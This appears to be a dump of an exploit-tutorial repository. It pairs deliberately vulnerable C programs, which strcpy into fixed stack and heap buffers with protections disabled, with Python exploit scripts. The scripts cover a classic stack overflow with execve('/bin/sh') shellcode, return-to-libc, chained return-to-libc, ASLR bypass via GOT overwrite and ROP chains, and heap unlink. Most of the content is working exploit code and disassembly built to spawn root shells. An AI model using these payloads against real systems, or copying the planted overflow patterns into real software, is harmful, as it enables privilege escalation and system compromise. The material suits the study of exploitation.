unsorted chunks"; 46 | goto errout; 47 | } 48 | p->fd = fwd; 49 | p->bk = bck; 50 | if (!in_smallbin_range(size)) 51 | { 52 | p->fd_nextsize = NULL; 53 | p->bk_nextsize = NULL; 54 | } 55 | bck->fd = p; 56 | fwd->bk = p; 57 | 58 | set_head(p, size | PREV_INUSE); 59 | set_foot(p, size); 60 | 61 | check_free_chunk(av, p); 62 | } 63 | 64 | /* 65 | If the chunk borders the current high end of memory, 66 | consolidate into top 67 | */ 68 | 69 | else { 70 | size += nextsize; 71 | set_head(p, size | PREV_INUSE); 72 | av->top = p; 73 | check_chunk(av, p); 74 | } 75 | ... 76 | } 77 | -------------------------------------------------------------------------------- /hof/unlink/malloc_unlink_snip.c: -------------------------------------------------------------------------------- 1 | ... 2 | #define unlink(P, BK, FD) { \ 3 | FD = P->fd; \ 4 | BK = P->bk; \ 5 | FD->bk = BK; \ 6 | BK->fd = FD; \ 7 | ... 8 | } 9 | ... 10 | 11 | -------------------------------------------------------------------------------- /hof/unlink/vuln.c: -------------------------------------------------------------------------------- 1 | /* Heap overflow vulnerable program. 2 | * [3] is vulnerable to heap overflow. 3 | * It can be exploited using unlink technique. 4 | */ 5 | #include 6 | #include 7 | 8 | int main( int argc, char * argv[] ) 9 | { 10 | char * first, * second; 11 | 12 | /*[1]*/ first = malloc( 666 ); 13 | /*[2]*/ second = malloc( 12 ); 14 | if(argc!=1) 15 | /*[3]*/ strcpy( first, argv[1] ); 16 | /*[4]*/ free( first ); 17 | /*[5]*/ free( second ); 18 | /*[6]*/ return( 0 ); 19 | } 20 | -------------------------------------------------------------------------------- /new/aslr/part1/eg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sploitfun/lsploits/4fe37d8bbea287272af701ebe98f9e08787deb3c/new/aslr/part1/eg -------------------------------------------------------------------------------- /new/aslr/part1/eg.c: -------------------------------------------------------------------------------- 1 | //eg.c 2 | //$gcc -g -o eg eg.c 3 | #include 4 | #include 5 | 6 | int main(int argc, char* argv[]) { 7 | printf("Hello %s\n", argv[1]); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /new/aslr/part1/exp.py: -------------------------------------------------------------------------------- 1 | #exp.py 2 | #!/usr/bin/env python 3 | import struct 4 | from subprocess import call 5 | 6 | system = 0x8048380 7 | exit = 0x80483a0 8 | system_arg = 0x80485b5 #Obtained from hexdump output of executable 'vuln' 9 | 10 | #endianess convertion 11 | def conv(num): 12 | return struct.pack(" 2 | #include 3 | 4 | /* Eventhough shell() function isnt invoked directly, its needed here since 'system@PLT' and 'exit@PLT' stub code should be present in executable to successfully exploit it. */ 5 | void shell() { 6 | system("/bin/sh"); 7 | exit(0); 8 | } 9 | 10 | int main(int argc, char* argv[]) { 11 | int i=0; 12 | char buf[256]; 13 | strcpy(buf,argv[1]); 14 | printf("%s\n",buf); 15 | return 0; 16 | } 17 | -------------------------------------------------------------------------------- /new/aslr/part2/core: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sploitfun/lsploits/4fe37d8bbea287272af701ebe98f9e08787deb3c/new/aslr/part2/core -------------------------------------------------------------------------------- /new/aslr/part2/exp.py: -------------------------------------------------------------------------------- 1 | #exp.py 2 | #!/usr/bin/env python 3 | import struct 4 | from subprocess import call 5 | 6 | libc_base_addr = 0xb7595000 7 | exit_off = 0x00032be0 #Obtained from "readelf -s libc.so.6 | grep system" command. 8 | system_off = 0x0003f060 #Obtained from "readelf -s libc.so.6 | grep exit" command. 9 | system_addr = libc_base_addr + system_off 10 | exit_addr = libc_base_addr + exit_off 11 | system_arg = 0x804827d 12 | 13 | #endianess convertion 14 | def conv(num): 15 | return struct.pack(" 3 | #include 4 | 5 | int main(int argc, char* argv[]) { 6 | char buf[256]; 7 | strcpy(buf,argv[1]); 8 | printf("%s\n",buf); 9 | fflush(stdout); 10 | return 0; 11 | } 12 | -------------------------------------------------------------------------------- /new/aslr/part3/core: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sploitfun/lsploits/4fe37d8bbea287272af701ebe98f9e08787deb3c/new/aslr/part3/core -------------------------------------------------------------------------------- /new/aslr/part3/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import struct 3 | from subprocess import call 4 | 5 | #GOT overwrite using ROP gadgets 6 | ''' 7 | G1: 0x0804849e: addl %eax, 0x5D5B04C4(%ebx) ; ret ; 8 | G2: 0x080484a2: popl %ebx ; pop ebp; ret ; 9 | G3: 0x????????: popl %eax ; ret ; (NOT found) 10 | G4: 0x080485b3: mov 0x34(%esp),%eax... 11 | G5: 0x08048380: pop ebx ; ret ; 12 | G6: 0x080485cd: pop esi ; pop edi ; pop ebp ; ret ; 13 | G7: 0x08048498: movb $0x1,0x804a028... 14 | ''' 15 | 16 | g1 = 0x0804849e 17 | g2 = 0x080484a2 18 | g4 = 0x080485b3 19 | g5 = 0x08048380 20 | g6 = 0x080485cd 21 | g7 = 0x08048498 22 | dummy = 0xdeadbeef 23 | esi = 0x01020101 24 | edi = 0x01020102 25 | ebx = 0x3fc9c18 #ebx = 0x8049f3c - (esi*4) + 0xe0 26 | off = 0xffff2810 27 | 28 | #Custom Stack 29 | #0x804a360 - Dummy EBP|seteuid@PLT|printf@PLT|seteuid_arg|sytem_arg 30 | cust_esp = 0x804a360 #Custom stack base address 31 | cust_base_esp = 0x804a360 #Custom stack base address 32 | #seteuid@PLT 0x80483c0 33 | seteuid_oct1 = 0x8048143 #08 34 | seteuid_oct2 = 0x8048130 #04 35 | seteuid_oct3 = 0x8048355 #83 36 | seteuid_oct4 = 0x80481cb #c0 37 | #printf@PLT 0x80483a0 38 | printf_oct1 = 0x8048143 #08 39 | printf_oct2 = 0x8048130 #04 40 | printf_oct3 = 0x8048355 #83 41 | printf_oct4 = 0x8048315 #a0 42 | #seteuid_arg 0x00000000 43 | seteuid_arg_src = 0x804a360 #This addr contains NULL byte. 44 | seteuid_arg_dst = 0x804a36c #Custom stack seteuid_arg's location 45 | #system_arg 0x804ac60 46 | system_arg_src_oct1 = 0x8048154 #/ 47 | system_arg_src_oct2 = 0x8048157 #b 48 | system_arg_src_oct3 = 0x8048156 #i 49 | system_arg_src_oct4 = 0x804815e #n 50 | system_arg_src_oct5 = 0x8048162 #s 51 | system_arg_src_oct6 = 0x80483a6 #h\0 52 | system_arg_dst = 0x804ac60 #Custom stack location which contains string "/bin/sh" 53 | system_arg_oct1 = 0x8048143 #08 54 | system_arg_oct2 = 0x8048130 #04 55 | #system_arg_oct3 = 0x8048520 #AC 56 | system_arg_oct3 = 0x8048f44 #AC 57 | system_arg_oct4 = 0x804819a #60 58 | 59 | strcpy_plt = 0x80483d0 #strcpy@PLT 60 | ppr_addr = 0x080485ce #popl %edi ; popl %ebp ; ret ; 61 | 62 | #Stack Pivot 63 | pr_addr = 0x080484a3 #popl %ebp ; ret ; 64 | lr_addr = 0x08048569 #leave ; ret ; 65 | 66 | #endianess convertion 67 | def conv(num): 68 | return struct.pack(" to custom stack) 135 | cust_esp += 1 136 | buf += conv(strcpy_plt) 137 | buf += conv(ppr_addr) 138 | buf += conv(cust_esp) 139 | buf += conv(seteuid_arg_src) 140 | cust_esp += 1 141 | buf += conv(strcpy_plt) 142 | buf += conv(ppr_addr) 143 | buf += conv(cust_esp) 144 | buf += conv(seteuid_arg_src) 145 | cust_esp += 1 146 | buf += conv(strcpy_plt) 147 | buf += conv(ppr_addr) 148 | buf += conv(cust_esp) 149 | buf += conv(seteuid_arg_src) 150 | cust_esp += 1 151 | buf += conv(strcpy_plt) 152 | buf += conv(ppr_addr) 153 | buf += conv(cust_esp) 154 | buf += conv(seteuid_arg_src) 155 | #Below stack frames are for strcpy (to copy &"/bin/sh" to custom stack) 156 | cust_esp += 1 157 | buf += conv(strcpy_plt) 158 | buf += conv(ppr_addr) 159 | buf += conv(cust_esp) 160 | buf += conv(system_arg_oct4) 161 | cust_esp += 1 162 | buf += conv(strcpy_plt) 163 | buf += conv(ppr_addr) 164 | buf += conv(cust_esp) 165 | buf += conv(system_arg_oct3) 166 | cust_esp += 1 167 | buf += conv(strcpy_plt) 168 | buf += conv(ppr_addr) 169 | buf += conv(cust_esp) 170 | buf += conv(system_arg_oct2) 171 | cust_esp += 1 172 | buf += conv(strcpy_plt) 173 | buf += conv(ppr_addr) 174 | buf += conv(cust_esp) 175 | buf += conv(system_arg_oct1) 176 | #Below stack frame is for strcpy (to copy "/bin/sh" to custom stack) 177 | buf += conv(strcpy_plt) 178 | buf += conv(ppr_addr) 179 | buf += conv(system_arg_dst) 180 | buf += conv(system_arg_src_oct1) 181 | system_arg_dst += 1 182 | buf += conv(strcpy_plt) 183 | buf += conv(ppr_addr) 184 | buf += conv(system_arg_dst) 185 | buf += conv(system_arg_src_oct2) 186 | system_arg_dst += 1 187 | buf += conv(strcpy_plt) 188 | buf += conv(ppr_addr) 189 | buf += conv(system_arg_dst) 190 | buf += conv(system_arg_src_oct3) 191 | system_arg_dst += 1 192 | buf += conv(strcpy_plt) 193 | buf += conv(ppr_addr) 194 | buf += conv(system_arg_dst) 195 | buf += conv(system_arg_src_oct4) 196 | system_arg_dst += 1 197 | buf += conv(strcpy_plt) 198 | buf += conv(ppr_addr) 199 | buf += conv(system_arg_dst) 200 | buf += conv(system_arg_src_oct1) 201 | system_arg_dst += 1 202 | buf += conv(strcpy_plt) 203 | buf += conv(ppr_addr) 204 | buf += conv(system_arg_dst) 205 | buf += conv(system_arg_src_oct5) 206 | system_arg_dst += 1 207 | buf += conv(strcpy_plt) 208 | buf += conv(ppr_addr) 209 | buf += conv(system_arg_dst) 210 | buf += conv(system_arg_src_oct6) 211 | #Stack Pivot 212 | buf += conv(pr_addr) 213 | buf += conv(cust_base_esp) 214 | buf += conv(lr_addr) 215 | 216 | #print ':'.join(x.encode('hex') for x in buf) 217 | 218 | print "Calling vulnerable program" 219 | call(["./vuln", buf]) 220 | -------------------------------------------------------------------------------- /new/aslr/part3/oexp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import struct 3 | from subprocess import call 4 | 5 | ''' 6 | G1: 0x0804849e: addl %eax, 0x5D5B04C4(%ebx) ; ret ; 7 | G2: 0x080484a2: popl %ebx ; pop ebp; ret ; 8 | G3: 0x????????: popl %eax ; ret ; (NOT found) 9 | G4: 0x080485b3: mov 0x34(%esp),%eax... 10 | G5: 0x08048380: pop ebx ; ret ; 11 | G6: 0x080485cd: pop esi ; pop edi ; pop ebp ; ret ; 12 | G7: 0x08048498: movb $0x1,0x804a028... 13 | ''' 14 | 15 | g1 = 0x0804849e 16 | g2 = 0x080484a2 17 | g4 = 0x080485b3 18 | g5 = 0x08048380 19 | g6 = 0x080485cd 20 | g7 = 0x08048498 21 | dummy = 0xdeadbeef 22 | esi = 0x01020101 23 | edi = 0x01020102 24 | ebx = 0x3fc9c18 #ebx = 0x8049f3c - (esi*4) + 0xe0 25 | off = 0xffff2810 26 | 27 | #endianess convertion 28 | def conv(num): 29 | return struct.pack(": 8 | 804839c: 53 push %ebx 9 | 804839d: 83 ec 08 sub $0x8,%esp 10 | 80483a0: e8 00 00 00 00 call 80483a5 <_init+0x9> 11 | 80483a5: 5b pop %ebx 12 | 80483a6: 81 c3 4f 1c 00 00 add $0x1c4f,%ebx 13 | 80483ac: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax 14 | 80483b2: 85 c0 test %eax,%eax 15 | 80483b4: 74 05 je 80483bb <_init+0x1f> 16 | 80483b6: e8 85 00 00 00 call 8048440 <__gmon_start__@plt> 17 | 80483bb: e8 40 01 00 00 call 8048500 18 | 80483c0: e8 8b 02 00 00 call 8048650 <__do_global_ctors_aux> 19 | 80483c5: 83 c4 08 add $0x8,%esp 20 | 80483c8: 5b pop %ebx 21 | 80483c9: c3 ret 22 | 23 | Disassembly of section .plt: 24 | 25 | 080483d0 : 26 | 80483d0: ff 35 f8 9f 04 08 pushl 0x8049ff8 27 | 80483d6: ff 25 fc 9f 04 08 jmp *0x8049ffc 28 | 80483dc: 00 00 add %al,(%eax) 29 | ... 30 | 31 | 080483e0 : 32 | 80483e0: ff 25 00 a0 04 08 jmp *0x804a000 33 | 80483e6: 68 00 00 00 00 push $0x0 34 | 80483eb: e9 e0 ff ff ff jmp 80483d0 <_init+0x34> 35 | 36 | 080483f0 : 37 | 80483f0: ff 25 04 a0 04 08 jmp *0x804a004 38 | 80483f6: 68 08 00 00 00 push $0x8 39 | 80483fb: e9 d0 ff ff ff jmp 80483d0 <_init+0x34> 40 | 41 | 08048400 : 42 | 8048400: ff 25 08 a0 04 08 jmp *0x804a008 43 | 8048406: 68 10 00 00 00 push $0x10 44 | 804840b: e9 c0 ff ff ff jmp 80483d0 <_init+0x34> 45 | 46 | 08048410 : 47 | 8048410: ff 25 0c a0 04 08 jmp *0x804a00c 48 | 8048416: 68 18 00 00 00 push $0x18 49 | 804841b: e9 b0 ff ff ff jmp 80483d0 <_init+0x34> 50 | 51 | 08048420 : 52 | 8048420: ff 25 10 a0 04 08 jmp *0x804a010 53 | 8048426: 68 20 00 00 00 push $0x20 54 | 804842b: e9 a0 ff ff ff jmp 80483d0 <_init+0x34> 55 | 56 | 08048430 : 57 | 8048430: ff 25 14 a0 04 08 jmp *0x804a014 58 | 8048436: 68 28 00 00 00 push $0x28 59 | 804843b: e9 90 ff ff ff jmp 80483d0 <_init+0x34> 60 | 61 | 08048440 <__gmon_start__@plt>: 62 | 8048440: ff 25 18 a0 04 08 jmp *0x804a018 63 | 8048446: 68 30 00 00 00 push $0x30 64 | 804844b: e9 80 ff ff ff jmp 80483d0 <_init+0x34> 65 | 66 | 08048450 : 67 | 8048450: ff 25 1c a0 04 08 jmp *0x804a01c 68 | 8048456: 68 38 00 00 00 push $0x38 69 | 804845b: e9 70 ff ff ff jmp 80483d0 <_init+0x34> 70 | 71 | 08048460 <__libc_start_main@plt>: 72 | 8048460: ff 25 20 a0 04 08 jmp *0x804a020 73 | 8048466: 68 40 00 00 00 push $0x40 74 | 804846b: e9 60 ff ff ff jmp 80483d0 <_init+0x34> 75 | 76 | Disassembly of section .text: 77 | 78 | 08048470 <_start>: 79 | 8048470: 31 ed xor %ebp,%ebp 80 | 8048472: 5e pop %esi 81 | 8048473: 89 e1 mov %esp,%ecx 82 | 8048475: 83 e4 f0 and $0xfffffff0,%esp 83 | 8048478: 50 push %eax 84 | 8048479: 54 push %esp 85 | 804847a: 52 push %edx 86 | 804847b: 68 40 86 04 08 push $0x8048640 87 | 8048480: 68 d0 85 04 08 push $0x80485d0 88 | 8048485: 51 push %ecx 89 | 8048486: 56 push %esi 90 | 8048487: 68 24 85 04 08 push $0x8048524 91 | 804848c: e8 cf ff ff ff call 8048460 <__libc_start_main@plt> 92 | 8048491: f4 hlt 93 | 8048492: 90 nop 94 | 8048493: 90 nop 95 | 8048494: 90 nop 96 | 8048495: 90 nop 97 | 8048496: 90 nop 98 | 8048497: 90 nop 99 | 8048498: 90 nop 100 | 8048499: 90 nop 101 | 804849a: 90 nop 102 | 804849b: 90 nop 103 | 804849c: 90 nop 104 | 804849d: 90 nop 105 | 804849e: 90 nop 106 | 804849f: 90 nop 107 | 108 | 080484a0 <__do_global_dtors_aux>: 109 | 80484a0: 55 push %ebp 110 | 80484a1: 89 e5 mov %esp,%ebp 111 | 80484a3: 53 push %ebx 112 | 80484a4: 83 ec 04 sub $0x4,%esp 113 | 80484a7: 80 3d 44 a0 04 08 00 cmpb $0x0,0x804a044 114 | 80484ae: 75 3f jne 80484ef <__do_global_dtors_aux+0x4f> 115 | 80484b0: a1 48 a0 04 08 mov 0x804a048,%eax 116 | 80484b5: bb 20 9f 04 08 mov $0x8049f20,%ebx 117 | 80484ba: 81 eb 1c 9f 04 08 sub $0x8049f1c,%ebx 118 | 80484c0: c1 fb 02 sar $0x2,%ebx 119 | 80484c3: 83 eb 01 sub $0x1,%ebx 120 | 80484c6: 39 d8 cmp %ebx,%eax 121 | 80484c8: 73 1e jae 80484e8 <__do_global_dtors_aux+0x48> 122 | 80484ca: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 123 | 80484d0: 83 c0 01 add $0x1,%eax 124 | 80484d3: a3 48 a0 04 08 mov %eax,0x804a048 125 | 80484d8: ff 14 85 1c 9f 04 08 call *0x8049f1c(,%eax,4) 126 | 80484df: a1 48 a0 04 08 mov 0x804a048,%eax 127 | 80484e4: 39 d8 cmp %ebx,%eax 128 | 80484e6: 72 e8 jb 80484d0 <__do_global_dtors_aux+0x30> 129 | 80484e8: c6 05 44 a0 04 08 01 movb $0x1,0x804a044 130 | 80484ef: 83 c4 04 add $0x4,%esp 131 | 80484f2: 5b pop %ebx 132 | 80484f3: 5d pop %ebp 133 | 80484f4: c3 ret 134 | 80484f5: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 135 | 80484f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 136 | 137 | 08048500 : 138 | 8048500: 55 push %ebp 139 | 8048501: 89 e5 mov %esp,%ebp 140 | 8048503: 83 ec 18 sub $0x18,%esp 141 | 8048506: a1 24 9f 04 08 mov 0x8049f24,%eax 142 | 804850b: 85 c0 test %eax,%eax 143 | 804850d: 74 12 je 8048521 144 | 804850f: b8 00 00 00 00 mov $0x0,%eax 145 | 8048514: 85 c0 test %eax,%eax 146 | 8048516: 74 09 je 8048521 147 | 8048518: c7 04 24 24 9f 04 08 movl $0x8049f24,(%esp) 148 | 804851f: ff d0 call *%eax 149 | 8048521: c9 leave 150 | 8048522: c3 ret 151 | 8048523: 90 nop 152 | 153 | 08048524
: 154 | 8048524: 55 push %ebp 155 | 8048525: 89 e5 mov %esp,%ebp 156 | 8048527: 57 push %edi 157 | 8048528: 83 e4 f0 and $0xfffffff0,%esp 158 | 804852b: 81 ec 20 01 00 00 sub $0x120,%esp 159 | 8048531: e8 ca fe ff ff call 8048400 160 | 8048536: 89 04 24 mov %eax,(%esp) 161 | 8048539: e8 d2 fe ff ff call 8048410 162 | 804853e: 83 7d 08 01 cmpl $0x1,0x8(%ebp) 163 | 8048542: 7f 18 jg 804855c 164 | 8048544: c7 04 24 a0 86 04 08 movl $0x80486a0,(%esp) 165 | 804854b: e8 e0 fe ff ff call 8048430 166 | 8048550: c7 04 24 01 00 00 00 movl $0x1,(%esp) 167 | 8048557: e8 f4 fe ff ff call 8048450 168 | 804855c: 8b 45 0c mov 0xc(%ebp),%eax 169 | 804855f: 83 c0 04 add $0x4,%eax 170 | 8048562: 8b 00 mov (%eax),%eax 171 | 8048564: 89 44 24 04 mov %eax,0x4(%esp) 172 | 8048568: 8d 44 24 20 lea 0x20(%esp),%eax 173 | 804856c: 89 04 24 mov %eax,(%esp) 174 | 804856f: e8 ac fe ff ff call 8048420 175 | 8048574: 8d 44 24 20 lea 0x20(%esp),%eax 176 | 8048578: c7 44 24 1c ff ff ff movl $0xffffffff,0x1c(%esp) 177 | 804857f: ff 178 | 8048580: 89 c2 mov %eax,%edx 179 | 8048582: b8 00 00 00 00 mov $0x0,%eax 180 | 8048587: 8b 4c 24 1c mov 0x1c(%esp),%ecx 181 | 804858b: 89 d7 mov %edx,%edi 182 | 804858d: f2 ae repnz scas %es:(%edi),%al 183 | 804858f: 89 c8 mov %ecx,%eax 184 | 8048591: f7 d0 not %eax 185 | 8048593: 83 e8 01 sub $0x1,%eax 186 | 8048596: 89 c2 mov %eax,%edx 187 | 8048598: b8 b2 86 04 08 mov $0x80486b2,%eax 188 | 804859d: 89 54 24 08 mov %edx,0x8(%esp) 189 | 80485a1: 8d 54 24 20 lea 0x20(%esp),%edx 190 | 80485a5: 89 54 24 04 mov %edx,0x4(%esp) 191 | 80485a9: 89 04 24 mov %eax,(%esp) 192 | 80485ac: e8 2f fe ff ff call 80483e0 193 | 80485b1: a1 40 a0 04 08 mov 0x804a040,%eax 194 | 80485b6: 89 04 24 mov %eax,(%esp) 195 | 80485b9: e8 32 fe ff ff call 80483f0 196 | 80485be: b8 00 00 00 00 mov $0x0,%eax 197 | 80485c3: 8b 7d fc mov -0x4(%ebp),%edi 198 | 80485c6: c9 leave 199 | 80485c7: c3 ret 200 | 80485c8: 90 nop 201 | 80485c9: 90 nop 202 | 80485ca: 90 nop 203 | 80485cb: 90 nop 204 | 80485cc: 90 nop 205 | 80485cd: 90 nop 206 | 80485ce: 90 nop 207 | 80485cf: 90 nop 208 | 209 | 080485d0 <__libc_csu_init>: 210 | 80485d0: 55 push %ebp 211 | 80485d1: 57 push %edi 212 | 80485d2: 56 push %esi 213 | 80485d3: 53 push %ebx 214 | 80485d4: e8 69 00 00 00 call 8048642 <__i686.get_pc_thunk.bx> 215 | 80485d9: 81 c3 1b 1a 00 00 add $0x1a1b,%ebx 216 | 80485df: 83 ec 1c sub $0x1c,%esp 217 | 80485e2: 8b 6c 24 30 mov 0x30(%esp),%ebp 218 | 80485e6: 8d bb 20 ff ff ff lea -0xe0(%ebx),%edi 219 | 80485ec: e8 ab fd ff ff call 804839c <_init> 220 | 80485f1: 8d 83 20 ff ff ff lea -0xe0(%ebx),%eax 221 | 80485f7: 29 c7 sub %eax,%edi 222 | 80485f9: c1 ff 02 sar $0x2,%edi 223 | 80485fc: 85 ff test %edi,%edi 224 | 80485fe: 74 29 je 8048629 <__libc_csu_init+0x59> 225 | 8048600: 31 f6 xor %esi,%esi 226 | 8048602: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 227 | 8048608: 8b 44 24 38 mov 0x38(%esp),%eax 228 | 804860c: 89 2c 24 mov %ebp,(%esp) 229 | 804860f: 89 44 24 08 mov %eax,0x8(%esp) 230 | 8048613: 8b 44 24 34 mov 0x34(%esp),%eax 231 | 8048617: 89 44 24 04 mov %eax,0x4(%esp) 232 | 804861b: ff 94 b3 20 ff ff ff call *-0xe0(%ebx,%esi,4) 233 | 8048622: 83 c6 01 add $0x1,%esi 234 | 8048625: 39 fe cmp %edi,%esi 235 | 8048627: 75 df jne 8048608 <__libc_csu_init+0x38> 236 | 8048629: 83 c4 1c add $0x1c,%esp 237 | 804862c: 5b pop %ebx 238 | 804862d: 5e pop %esi 239 | 804862e: 5f pop %edi 240 | 804862f: 5d pop %ebp 241 | 8048630: c3 ret 242 | 8048631: eb 0d jmp 8048640 <__libc_csu_fini> 243 | 8048633: 90 nop 244 | 8048634: 90 nop 245 | 8048635: 90 nop 246 | 8048636: 90 nop 247 | 8048637: 90 nop 248 | 8048638: 90 nop 249 | 8048639: 90 nop 250 | 804863a: 90 nop 251 | 804863b: 90 nop 252 | 804863c: 90 nop 253 | 804863d: 90 nop 254 | 804863e: 90 nop 255 | 804863f: 90 nop 256 | 257 | 08048640 <__libc_csu_fini>: 258 | 8048640: f3 c3 repz ret 259 | 260 | 08048642 <__i686.get_pc_thunk.bx>: 261 | 8048642: 8b 1c 24 mov (%esp),%ebx 262 | 8048645: c3 ret 263 | 8048646: 90 nop 264 | 8048647: 90 nop 265 | 8048648: 90 nop 266 | 8048649: 90 nop 267 | 804864a: 90 nop 268 | 804864b: 90 nop 269 | 804864c: 90 nop 270 | 804864d: 90 nop 271 | 804864e: 90 nop 272 | 804864f: 90 nop 273 | 274 | 08048650 <__do_global_ctors_aux>: 275 | 8048650: 55 push %ebp 276 | 8048651: 89 e5 mov %esp,%ebp 277 | 8048653: 53 push %ebx 278 | 8048654: 83 ec 04 sub $0x4,%esp 279 | 8048657: a1 14 9f 04 08 mov 0x8049f14,%eax 280 | 804865c: 83 f8 ff cmp $0xffffffff,%eax 281 | 804865f: 74 13 je 8048674 <__do_global_ctors_aux+0x24> 282 | 8048661: bb 14 9f 04 08 mov $0x8049f14,%ebx 283 | 8048666: 66 90 xchg %ax,%ax 284 | 8048668: 83 eb 04 sub $0x4,%ebx 285 | 804866b: ff d0 call *%eax 286 | 804866d: 8b 03 mov (%ebx),%eax 287 | 804866f: 83 f8 ff cmp $0xffffffff,%eax 288 | 8048672: 75 f4 jne 8048668 <__do_global_ctors_aux+0x18> 289 | 8048674: 83 c4 04 add $0x4,%esp 290 | 8048677: 5b pop %ebx 291 | 8048678: 5d pop %ebp 292 | 8048679: c3 ret 293 | 804867a: 90 nop 294 | 804867b: 90 nop 295 | 296 | Disassembly of section .fini: 297 | 298 | 0804867c <_fini>: 299 | 804867c: 53 push %ebx 300 | 804867d: 83 ec 08 sub $0x8,%esp 301 | 8048680: e8 00 00 00 00 call 8048685 <_fini+0x9> 302 | 8048685: 5b pop %ebx 303 | 8048686: 81 c3 6f 19 00 00 add $0x196f,%ebx 304 | 804868c: e8 0f fe ff ff call 80484a0 <__do_global_dtors_aux> 305 | 8048691: 83 c4 08 add $0x8,%esp 306 | 8048694: 5b pop %ebx 307 | 8048695: c3 ret 308 | -------------------------------------------------------------------------------- /new/aslr/part3/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sploitfun/lsploits/4fe37d8bbea287272af701ebe98f9e08787deb3c/new/aslr/part3/vuln -------------------------------------------------------------------------------- /new/aslr/part3/vuln.c: -------------------------------------------------------------------------------- 1 | // vuln.c 2 | // gcc -o vuln vuln.c -fno-stack-protector 3 | #include 4 | #include 5 | #include 6 | 7 | int main (int argc, char **argv) 8 | { 9 | char buf[256]; 10 | int i; 11 | seteuid (getuid()); 12 | if (argc < 2) 13 | { 14 | puts ("Need an argument\n"); 15 | exit (1); 16 | } 17 | strcpy (buf, argv[1]); 18 | printf ("%s\nLen:%d\n", buf, (int)strlen(buf)); 19 | return (0); 20 | } 21 | -------------------------------------------------------------------------------- /new/csof/README: -------------------------------------------------------------------------------- 1 | Classic Stack Overflow 2 | -------------------------------------------------------------------------------- /new/csof/exp.py: -------------------------------------------------------------------------------- 1 | #exp.py 2 | #!/usr/bin/env python 3 | import struct 4 | from subprocess import call 5 | 6 | #Stack address where shellcode is copied. 7 | ret_addr = 0xbffff1d0 8 | #execve(/bin/sh) 9 | scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" 10 | 11 | #endianess convertion 12 | def conv(num): 13 | return struct.pack(" 2 | #include 3 | 4 | int main(int argc, char* argv[]) { 5 | /* [1] */ char buf[256]; 6 | /* [2] */ strcpy(buf,argv[1]); 7 | /* [3] */ printf("Input:%s\n",buf); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /new/nx/cr2l/README: -------------------------------------------------------------------------------- 1 | Chained return-to-libc 2 | -------------------------------------------------------------------------------- /new/nx/cr2l/core: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sploitfun/lsploits/4fe37d8bbea287272af701ebe98f9e08787deb3c/new/nx/cr2l/core -------------------------------------------------------------------------------- /new/nx/cr2l/exp.py: -------------------------------------------------------------------------------- 1 | #exp.py 2 | #!/usr/bin/env python 3 | import struct 4 | from subprocess import call 5 | 6 | fake_ebp0 = 0xbffff1b0 7 | fake_ebp1 = 0xbffff1c8 8 | fake_ebp2 = 0xbffff1e0 9 | fake_ebp3 = 0xbffff1f8 10 | fake_ebp4 = 0xbffff214 11 | fake_ebp5 = 0xbffff224 12 | fake_ebp6 = 0xbffff234 13 | fake_ebp7 = 0xbffff244 14 | leave_ret = 0x0804851c 15 | sprintf_addr = 0xb7e6e8d0 16 | seteuid_addr = 0xb7f09720 17 | system_addr = 0xb7e61060 18 | exit_addr = 0xb7e54be0 19 | sprintf_arg1 = 0xbffff220 20 | sprintf_arg2 = 0x80485f0 21 | sprintf_arg3 = 0xbffff24c 22 | system_arg = 0x804829d 23 | exit_arg = 0xffffffff 24 | 25 | #endianess convertion 26 | def conv(num): 27 | return struct.pack(" 2 | #include 3 | 4 | int main(int argc, char* argv[]) { 5 | char buf[256]; 6 | /* Temporarily drop privileges */ 7 | seteuid(getuid()); 8 | strcpy(buf,argv[1]); 9 | printf("%s",buf); 10 | fflush(stdout); 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /new/nx/r2l/README: -------------------------------------------------------------------------------- 1 | Return-to-libc 2 | -------------------------------------------------------------------------------- /new/nx/r2l/exp.py: -------------------------------------------------------------------------------- 1 | #exp.py 2 | #!/usr/bin/env python 3 | import struct 4 | from subprocess import call 5 | 6 | #Since ALSR is disabled, libc base address would remain constant and hence we can easily find the function address we want by adding the offset to it. 7 | #For example system address = libc base address + system offset 8 | #where 9 | #libc base address = 0xb7e22000 (Constant address, it can also be obtained from cat /proc//maps) 10 | #system offset = 0x0003f060 (obtained from "readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system") 11 | 12 | system = 0xb7e61060 #0xb7e2000+0x0003f060 13 | exit = 0xb7e54be0 #0xb7e2000+0x00032be0 14 | 15 | #system_arg points to 'sh' substring of 'fflush' string. 16 | #This is the reason for adding fflush(stdout) in vuln.c, since to spawn a shell, system argument should be 'sh'. If there is no 'sh' string in the binary, we cant spawn a shell. 17 | system_arg = 0x804827d #(obtained from hexdump output of the binary) 18 | 19 | #endianess conversion 20 | def conv(num): 21 | return struct.pack(" 3 | #include 4 | 5 | int main(int argc, char* argv[]) { 6 | char buf[256]; 7 | strcpy(buf,argv[1]); 8 | printf("%s\n",buf); 9 | fflush(stdout); 10 | return 0; 11 | } 12 | -------------------------------------------------------------------------------- /new/nx/r2l/vuln_priv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sploitfun/lsploits/4fe37d8bbea287272af701ebe98f9e08787deb3c/new/nx/r2l/vuln_priv -------------------------------------------------------------------------------- /new/nx/r2l/vuln_priv.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char* argv[]) { 5 | char buf[256]; 6 | /* Temporarily drop privileges */ 7 | seteuid(getuid()); 8 | strcpy(buf,argv[1]); 9 | printf("%s\n",buf); 10 | 